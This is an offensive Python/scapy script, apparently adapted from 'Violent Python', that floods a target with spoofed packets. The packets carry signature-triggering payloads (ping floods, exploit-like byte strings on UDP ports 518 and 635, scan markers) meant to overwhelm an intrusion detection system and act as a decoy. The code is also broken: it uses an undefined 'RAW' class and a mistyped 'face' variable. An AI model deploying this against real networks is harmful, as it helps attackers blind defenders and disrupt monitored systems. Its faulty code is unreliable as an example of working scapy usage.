#!/usr/bin/env python2
# written by Moses Arocha
# Written with the help of TJ O'Connor in his book "Violent Python"
# This code will attempt to overload the IDS through sending multiple alerts, causing the network administrator to attempt to fix the problems, can be used as a decoy
import optparse
from scapy.all import *
from random import randint

def ddosTest(src, dst, iface, count):
	pkt = IP(src=src, dst=dst)/ICMP(type=8, id=679)/Raw(load='1234567890')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src, dst=dst)/ICMP(type=0)/RAW(load='BBBBBBBBBBBB')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src, dst=dst) /UDP(dport=53)/RAW(load='PONG')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src, dst=dst)/ICMP(type=0, id=455)
	send(pkt, iface=iface, count=count)

def exploitTest(src, dst, iface, count):
	pkt = IP(src=src, dst=dst) /UDP(dport=518) /RAW(load='\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src, dst=dst) / UDP(dport=635) /RAW(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
	send(pkt, iface=face, count=count)

def scanTest(src, dst, iface, count):
	pkt = IP(src=src, dst=dst) / UDP(dport=7) /RAW(load='cyberpoliceman')
	send(pkt)
	pkt = IP(src=src, dst=dst) / UDP(dport=10080) /RAW(load='AMANDAPANDAHANDACANDA')
	send(pkt, iface=iface, count=count)

# This program will attempt to overload an IDS by sending so many recongizable threats, that it overloads the services
def main():
	parser = optparse.OptionParser("Usages For Program: -I <Interface> -s <src> -t <Target> -c <count>")
	parser.add_option('-I', dest='iface', type='string', help = 'Specify Network Interface')
	parser.add_option('-t', dest='tgt', type='string', help='Type Target Address')
	parser.add_option('-s', dest='src', type='string', help='Specify Source IP Address')
	parser.add_option('-c', dest='count', type='string', help='Specify Packet Count')
	(options, args) = parser.parse_args()
	if not os.geteuid() == 0:
		sys.exit('\t Please Run As Root!!') # Checks to see if the user is root, this code can only be run in root
	if options.iface == None:
		iface = 'wlan0'
	else:
		iface = options.iface
	if options.src == None:
		src = '.'.join([str(randint(1,254)) for x in range(4)])
	else:
		src = options.src
	if options.tgt == None:
		print parser.usage
		exit(0)
	else:
		dst=options.tgt
	if options.count == None:
		count = 1
	else:
		count = options.count
	ddosTest(src, dst, iface, count)
	exploitTest(src, dst, iface, count)
	scanTest(src, dst, iface, count)
	

if __name__ == '__main__':
	main()
